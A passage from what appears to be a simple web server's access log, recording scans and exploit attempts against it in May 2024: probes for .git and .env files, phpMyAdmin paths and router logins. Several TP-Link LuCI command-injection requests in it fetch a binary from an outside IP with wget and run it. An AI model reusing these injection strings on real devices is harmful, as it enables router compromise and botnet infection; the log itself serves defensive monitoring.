HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:36:57] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:36:57] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:37:13] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:37:13] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:37:14] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:37:14] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:37:15] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:37:15] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:37:22] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:37:22] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:37:30] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:37:30] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:37:39] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:37:39] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:38:00] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:38:00] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:38:01] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:38:01] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:38:02] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:38:02] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:38:02] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:38:02] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:38:18] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:38:18] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:38:27] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:38:27] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:38:35] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:38:35] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:38:35] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:38:35] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:38:42] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:38:42] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:38:50] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:38:50] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:38:51] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:38:51] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:38:52] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:38:52] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:38:52] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:38:52] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:38:53] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:38:53] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:38:54] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:38:54] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:38:54] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:38:54] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:38:55] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:38:55] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:38:56] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:38:56] "PUT /SDK/webLanguage HTTP/1.1" 501 - 80.94.92.60 - - [01/May/2024 20:38:56] code 501, message Unsupported method ('PUT') 80.94.92.60 - - [01/May/2024 20:38:56] "PUT /SDK/webLanguage HTTP/1.1" 501 - 185.224.128.43 - - [01/May/2024 20:57:37] "GET / HTTP/1.1" 200 - 196.190.60.130 - - [01/May/2024 22:38:40] "GET / HTTP/1.1" 200 - 196.190.60.130 - - [01/May/2024 22:38:42] "GET / HTTP/1.1" 200 - 196.190.60.130 - - [01/May/2024 22:38:44] code 404, message File not found 196.190.60.130 - - [01/May/2024 22:38:44] "GET /favicon.ico HTTP/1.1" 404 - 196.190.60.130 - - [01/May/2024 22:39:10] "GET / HTTP/1.1" 200 - 196.190.60.130 - - [01/May/2024 22:39:11] "GET /IDR714.T.202312131214.png HTTP/1.1" 200 - 185.16.38.111 - - [01/May/2024 22:43:22] "GET / HTTP/1.1" 200 - 185.196.11.177 - - [01/May/2024 23:09:14] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [02/May/2024 00:19:39] "GET / HTTP/1.1" 200 - 141.98.11.179 - - [02/May/2024 01:51:51] code 501, message Unsupported method ('CONNECT') 141.98.11.179 - - [02/May/2024 01:51:51] "CONNECT www.bing.com:443 HTTP/1.1" 501 - 185.224.128.43 - - [02/May/2024 01:52:44] "GET / HTTP/1.1" 200 - 165.227.111.8 - - [02/May/2024 02:01:10] code 400, message Bad request version ('À\\x13À') 165.227.111.8 - - [02/May/2024 02:01:10] "\x16\x03\x01\x00ê\x01\x00\x00æ\x03\x03Ütý\x8bµÂÃÚ\x9e\x16\x91\x8cÌQ¯bgyI®\x8f¤AD\x95\x8bÙ\x08Ä´E \x9d`ÕYH\x09W\x89\x0c\x9c°~vNó~LÕ°\x90r\x15kuù`³Y¼Ò¢Y\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 165.227.111.8 - - [02/May/2024 02:01:11] code 404, message File not found 165.227.111.8 - - [02/May/2024 02:01:11] "GET /phpmyadmin/index.php HTTP/1.1" 404 - 87.121.69.52 - - [02/May/2024 02:17:19] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [02/May/2024 02:17:19] "CONNECT google.com:443 HTTP/1.1" 501 - 185.16.38.111 - - [02/May/2024 02:24:49] "GET / HTTP/1.1" 200 - 195.1.144.107 - - [02/May/2024 03:14:08] code 404, message File not found 195.1.144.107 - - [02/May/2024 03:14:08] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 - 141.98.11.79 - - [02/May/2024 03:40:55] code 501, message Unsupported method ('CONNECT') 141.98.11.79 - - [02/May/2024 03:40:55] "CONNECT google.com:443 HTTP/1.1" 501 - 185.224.128.31 - - [02/May/2024 04:45:23] "GET / HTTP/1.1" 200 - 66.240.205.34 - - [02/May/2024 05:02:40] code 400, message Bad request version ('ô') 66.240.205.34 - - [02/May/2024 05:02:40] "H\x00\x00\x00tj¨\x9e#D\x98+Êð§»lÅ\x19×\x8d¶\x18íJ\x1enÁùxu[lðE\x1d-jìÔxLÉrÉ\x15\x10uà%\x86Rtg\x05fv\x86]%Ì\x80\x0cèÏ®\x00µÀfÈ\x8dDÅ\x09ô" 400 - 185.16.38.111 - - [02/May/2024 05:09:34] "GET / HTTP/1.1" 200 - 198.235.24.51 - - [02/May/2024 05:37:57] "GET / HTTP/1.0" 200 - 195.1.144.109 - - [02/May/2024 05:57:47] code 404, message File not found 195.1.144.109 - - [02/May/2024 05:57:47] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 - 185.16.38.111 - - [02/May/2024 06:16:55] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [02/May/2024 06:52:32] "GET / HTTP/1.1" 200 - 122.96.28.213 - - [02/May/2024 07:05:30] "GET / HTTP/1.1" 200 - 125.82.243.204 - - [02/May/2024 07:05:42] "GET / HTTP/1.1" 200 - 122.96.28.5 - - [02/May/2024 07:05:44] code 404, message File not found 122.96.28.5 - - [02/May/2024 07:05:44] "GET /favicon.ico HTTP/1.1" 404 - 101.36.114.124 - - [02/May/2024 07:09:09] code 400, message Bad request version ('h\\x16ø}\\x03i\\x14ô') 101.36.114.124 - - [02/May/2024 07:09:09] "\x16\x03\x01\x01\x17\x01\x00\x01\x13\x03\x03æe\x08~9Ì\x1e\\\x9e¾lµü'\x86X\x06\x9a§P~«ÏÐ\x90\x83é\x14\x0e\x1cýá ³z}µ9\x91Kh\x1eÔúô \x7f\x9aQÓoú\x181\x1fh\x16ø}\x03i\x14ô" 400 - 101.36.114.124 - - [02/May/2024 07:09:20] "GET / HTTP/1.1" 200 - 101.36.114.124 - - [02/May/2024 07:09:21] code 404, message File not found 101.36.114.124 - - [02/May/2024 07:09:21] "GET /favicon.ico HTTP/1.1" 404 - 101.36.114.124 - - [02/May/2024 07:09:21] code 404, message File not found 101.36.114.124 - - [02/May/2024 07:09:21] "GET /robots.txt HTTP/1.1" 404 - 101.36.114.124 - - [02/May/2024 07:09:22] code 404, message File not found 101.36.114.124 - - [02/May/2024 07:09:22] "GET /sitemap.xml HTTP/1.1" 404 - 101.36.114.124 - - [02/May/2024 07:09:23] "GET / HTTP/1.1" 200 - 101.36.114.124 - - [02/May/2024 07:09:24] "GET /images/ HTTP/1.1" 200 - 31.7.62.226 - - [02/May/2024 07:15:53] code 404, message File not found 31.7.62.226 - - [02/May/2024 07:15:53] "GET /.git/config HTTP/1.1" 404 - ---------------------------------------- Exception occurred during processing of request from ('167.94.146.53', 53498) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.146.53 - - [02/May/2024 07:27:42] "GET / HTTP/1.1" 200 - 167.94.146.53 - - [02/May/2024 07:27:46] "GET / HTTP/1.1" 200 - 167.94.146.53 - - [02/May/2024 07:27:46] code 505, message Invalid HTTP version (2.0) 167.94.146.53 - - [02/May/2024 07:27:46] "PRI * HTTP/2.0" 505 - 167.94.146.53 - - [02/May/2024 07:27:47] code 404, message File not found 167.94.146.53 - - [02/May/2024 07:27:47] "GET /favicon.ico HTTP/1.1" 404 - 12.208.125.142 - - [02/May/2024 07:37:48] "HEAD / HTTP/1.1" 200 - 12.208.125.142 - - [02/May/2024 07:37:48] "GET / HTTP/1.1" 200 - 12.208.125.142 - - [02/May/2024 07:37:48] code 404, message File not found 12.208.125.142 - - [02/May/2024 07:37:48] "HEAD /invoker/EJBInvokerServlet HTTP/1.1" 404 - 87.121.69.52 - - [02/May/2024 08:06:01] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [02/May/2024 08:06:01] "CONNECT google.com:443 HTTP/1.1" 501 - 45.142.182.96 - - [02/May/2024 08:18:39] "GET / HTTP/1.1" 200 - 198.235.24.234 - - [02/May/2024 08:22:38] code 400, message Bad HTTP/0.9 request type ("\\x16\\x03\\x01\\x00î\\x01\\x00\\x00ê\\x03\\x03êêÕÊ\\x15NîyÈðX'W\\x92\\x14&\\x0f¾×\\\\?") 198.235.24.234 - - [02/May/2024 08:22:38] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03êêÕÊ\x15NîyÈðX'W\x92\x14&\x0f¾×\\?\x0d¶>Ì" 400 - 198.235.24.234 - - [02/May/2024 08:22:39] code 400, message Bad request version ('À(À$À\\x14À') 198.235.24.234 - - [02/May/2024 08:22:39] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03\x9c\x95\x14¼jýýÔ=v\x0e\x13\x87\x1bt3Ü\x9d">\x0c¬\x95x\x04£\x0f»~\x10\x03"\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À\x09À(À$À\x14À" 400 - 31.7.62.226 - - [02/May/2024 09:45:23] code 404, message File not found 31.7.62.226 - - [02/May/2024 09:45:23] "GET /.git/config.bak HTTP/1.1" 404 - 66.240.205.34 - - [02/May/2024 10:08:32] code 400, message Bad request version ("x64|'|'|No|'|'|0.7d|'|'|..|'|'|AA==|'|'|112.inf|'|'|SGFjS2VkDQoxOTIuMTY4LjkyLjIyMjo1NTUyDQpEZXNrdG9wDQpjbGllbnRhLmV4ZQ0KRmFsc2UNCkZhbHNlDQpUcnVlDQpGYWxzZQ==12.act|'|'|AA==") 66.240.205.34 - - [02/May/2024 10:08:32] "145.ll|'|'|SGFjS2VkX0Q0OTkwNjI3|'|'|WIN-JNAPIER0859|'|'|JNapier|'|'|19-02-01|'|'||'|'|Win 7 Professional SP1 x64|'|'|No|'|'|0.7d|'|'|..|'|'|AA==|'|'|112.inf|'|'|SGFjS2VkDQoxOTIuMTY4LjkyLjIyMjo1NTUyDQpEZXNrdG9wDQpjbGllbnRhLmV4ZQ0KRmFsc2UNCkZhbHNlDQpUcnVlDQpGYWxzZQ==12.act|'|'|AA==" 400 - 64.62.156.115 - - [02/May/2024 10:49:09] code 400, message Bad request version ('À\\x14À') 64.62.156.115 - - [02/May/2024 10:49:09] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x0350! \x8df½^Znó\x81· ¦Nª&\\!¬ÈPY\\Á@\x82q\x1aìÒ\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 146.19.24.28 - - [02/May/2024 11:22:24] "GET / HTTP/1.1" 200 - 185.142.236.41 - - [02/May/2024 11:28:12] "GET / HTTP/1.1" 200 - 185.142.236.41 - - [02/May/2024 11:28:13] code 404, message File not found 185.142.236.41 - - [02/May/2024 11:28:13] "GET /robots.txt HTTP/1.1" 404 - 185.142.236.41 - - [02/May/2024 11:28:14] code 404, message File not found 185.142.236.41 - - [02/May/2024 11:28:14] "GET /sitemap.xml HTTP/1.1" 404 - 185.142.236.41 - - [02/May/2024 11:28:15] code 404, message File not found 185.142.236.41 - - [02/May/2024 11:28:15] "GET /.well-known/security.txt HTTP/1.1" 404 - 185.142.236.41 - - [02/May/2024 11:28:17] code 404, message File not found 185.142.236.41 - - [02/May/2024 11:28:17] "GET /favicon.ico HTTP/1.1" 404 - 45.95.146.29 - - [02/May/2024 11:29:28] code 501, message Unsupported method ('POST') 45.95.146.29 - - [02/May/2024 11:29:28] "POST /boaform/admin/formLogin HTTP/1.1" 501 - 185.224.128.43 - - [02/May/2024 11:35:04] "GET / HTTP/1.1" 200 - 31.7.62.226 - - [02/May/2024 12:14:34] code 404, message File not found 31.7.62.226 - - [02/May/2024 12:14:34] "GET /.git/config.old HTTP/1.1" 404 - 185.16.38.111 - - [02/May/2024 12:54:37] "GET / HTTP/1.1" 200 - 45.156.128.37 - - [02/May/2024 13:13:34] "GET / HTTP/1.1" 200 - 87.121.105.207 - - [02/May/2024 13:27:01] code 404, message File not found 87.121.105.207 - - [02/May/2024 13:27:01] "GET /.env HTTP/1.1" 404 - 87.121.105.207 - - [02/May/2024 13:27:02] code 501, message Unsupported method ('POST') 87.121.105.207 - - [02/May/2024 13:27:02] "POST / HTTP/1.1" 501 - 87.121.105.207 - - [02/May/2024 13:27:37] code 404, message File not found 87.121.105.207 - - [02/May/2024 13:27:37] "GET /sendgrid/.env HTTP/1.1" 404 - 87.121.105.207 - - [02/May/2024 13:27:37] code 501, message Unsupported method ('POST') 87.121.105.207 - - [02/May/2024 13:27:37] "POST / HTTP/1.1" 501 - 184.105.247.195 - - [02/May/2024 13:48:03] "GET / HTTP/1.1" 200 - 184.105.247.195 - - [02/May/2024 13:51:48] code 404, message File not found 184.105.247.195 - - [02/May/2024 13:51:48] "GET /favicon.ico HTTP/1.1" 404 - 184.105.247.195 - - [02/May/2024 13:52:30] code 404, message File not found 184.105.247.195 - - [02/May/2024 13:52:30] "GET /geoserver/web/ HTTP/1.1" 404 - 46.174.191.28 - - [02/May/2024 13:58:00] "GET / HTTP/1.0" 200 - 185.191.126.213 - - [02/May/2024 14:00:52] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [02/May/2024 14:05:13] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [02/May/2024 14:05:13] "CONNECT google.com:443 HTTP/1.1" 501 - 138.197.71.229 - - [02/May/2024 14:32:47] "GET / HTTP/1.0" 200 - 138.197.71.229 - - [02/May/2024 14:42:33] "GET / HTTP/1.1" 200 - 138.197.71.229 - - [02/May/2024 14:42:33] code 404, message File not found 138.197.71.229 - - [02/May/2024 14:42:33] "GET /favicon.ico HTTP/1.1" 404 - 45.142.182.96 - - [02/May/2024 14:47:40] "GET / HTTP/1.1" 200 - 185.191.126.213 - - [02/May/2024 15:09:38] "GET / HTTP/1.1" 200 - 94.156.79.228 - - [02/May/2024 16:00:17] "GET / HTTP/1.1" 200 - 162.243.142.48 - - [02/May/2024 16:39:41] code 400, message Bad request syntax ('MGLNDD_203.219.129.101_80') 162.243.142.48 - - [02/May/2024 16:39:41] "MGLNDD_203.219.129.101_80" 400 - 185.224.128.43 - - [02/May/2024 16:51:57] "GET / HTTP/1.1" 200 - 172.104.242.173 - - [02/May/2024 16:56:01] code 400, message Bad request version ('¯+\\xadKkÅà\\\\s\\x9c½Ë') 172.104.242.173 - - [02/May/2024 16:56:01] "º«d¡EZCÛM\x87î^ý¿\x159 XÔ>\x12\x98Ä<à\x13Ï\x00¬ 9×\x90#8~\x8cÞ\x9dReF¿%1Qà\x9d\x06&g»\x82\x95\x19í\x07\x14\x19ZP\x80+\x94eÃæ\x85\x06¤\x99\x8b\x19l\x01ê\x88Y\x91\x16\x95ÄÈ\x0eH\x02Ç\x93gÁ4FW\x05|ûóT¸ýË»)ãÎÝÍ7\x9eïP\x8c¤[Vý\x98Él\x82õäÁd\x87X÷\x9b¿èq\x12\x99&Û,õ\x87ר\x97j;ã꧴°\x02­\x8dE\x9bªB\x80\x0e)©é¯}\x18\x8e¸\x1e\x99\x04ï¨\x8cè\x04âÓí)1\x91Á\x8f\x88\x8c\x81ðÛ¥\x88\x95H\x9bZ«Î¿ôE%P*\x88KFY6\x9eç::jÔ\x8a¨V\x9aª«¯Ã&.í[\x04Åe\x7f\x08¾\x8ar§°\x99F÷\x11åÖ\x96\x8cIm+w\x1cýuU\x14\x0f!x¬èMPyÃ\x19!2 íÀ}!Rw\x14\x8e\x1bÄá ¯+­KkÅà\\s\x9c½Ë" 400 - 103.245.236.120 - - [02/May/2024 16:56:01] code 404, message File not found 103.245.236.120 - - [02/May/2024 16:56:01] "GET /cgi-bin/orospucoc.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 - 188.242.7.19 - - [02/May/2024 17:53:12] "GET / HTTP/1.1" 200 - 195.1.144.107 - - [02/May/2024 17:54:43] code 404, message File not found 195.1.144.107 - - [02/May/2024 17:54:43] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 - 185.242.226.10 - - [02/May/2024 18:09:24] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [02/May/2024 18:11:13] "GET / HTTP/1.1" 200 - 195.1.144.109 - - [02/May/2024 18:39:51] code 404, message File not found 195.1.144.109 - - [02/May/2024 18:39:51] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 - 185.16.38.111 - - [02/May/2024 18:47:28] "GET / HTTP/1.1" 200 - 141.98.11.79 - - [02/May/2024 19:29:03] code 501, message Unsupported method ('CONNECT') 141.98.11.79 - - [02/May/2024 19:29:03] "CONNECT google.com:443 HTTP/1.1" 501 - 35.203.211.153 - - [02/May/2024 19:29:49] "GET / HTTP/1.1" 200 - 83.97.73.245 - - [02/May/2024 19:55:35] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 - 87.236.176.4 - - [02/May/2024 20:01:40] "GET / HTTP/1.1" 200 - 117.235.16.106 - - [02/May/2024 20:14:26] "GET / HTTP/1.1" 200 - 117.235.16.106 - - [02/May/2024 20:14:28] code 404, message File not found 117.235.16.106 - - [02/May/2024 20:14:28] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 - 185.79.28.50 - - [02/May/2024 20:37:21] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [02/May/2024 20:45:32] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [02/May/2024 20:45:32] "CONNECT google.com:443 HTTP/1.1" 501 - 3.101.216.103 - - [02/May/2024 20:51:00] "HEAD / HTTP/1.1" 200 - 3.101.240.121 - - [02/May/2024 20:51:09] "HEAD / HTTP/1.1" 200 - 8.140.23.141 - - [02/May/2024 20:52:13] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:13] "GET http://203.219.129.101:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:14] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:14] "GET http://203.219.129.101:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:14] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:14] "GET http://203.219.129.101:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:15] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:15] "GET http://203.219.129.101:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:15] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:15] "GET http://203.219.129.101:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:16] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:16] "GET http://203.219.129.101:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:18] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:18] "GET http://203.219.129.101:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:18] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:18] "GET http://203.219.129.101:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:19] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:19] "GET http://203.219.129.101:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:19] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:19] "GET http://203.219.129.101:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:20] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:20] "GET http://203.219.129.101:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:24] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:24] "GET http://203.219.129.101:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:24] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:24] "GET http://203.219.129.101:80/pma/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:26] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:26] "GET http://203.219.129.101:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:26] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:26] "GET http://203.219.129.101:80/myadmin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:27] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:27] "GET http://203.219.129.101:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:28] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:28] "GET http://203.219.129.101:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:28] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:28] "GET http://203.219.129.101:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:29] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:29] "GET http://203.219.129.101:80/SQL/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:29] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:29] "GET http://203.219.129.101:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:30] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:30] "GET http://203.219.129.101:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:31] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:31] "GET http://203.219.129.101:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:31] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:31] "GET http://203.219.129.101:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:32] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:32] "GET http://203.219.129.101:80/admin/pma/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:32] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:32] "GET http://203.219.129.101:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:33] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:33] "GET http://203.219.129.101:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:34] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:34] "GET http://203.219.129.101:80/webadmin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:34] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:34] "GET http://203.219.129.101:80/admin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:38] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:38] "GET http://203.219.129.101:80/dbadmin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:39] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:39] "GET http://203.219.129.101:80/mysql/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:39] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:39] "GET http://203.219.129.101:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:40] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:40] "GET http://203.219.129.101:80/phpma/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:40] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:40] "GET http://203.219.129.101:80/sqlweb/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:41] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:41] "GET http://203.219.129.101:80/webdb/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:42] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:42] "GET http://203.219.129.101:80/websql/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 20:52:42] code 404, message File not found 8.140.23.141 - - [02/May/2024 20:52:42] "GET http://203.219.129.101:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 - 8.140.23.141 - - [02/May/2024 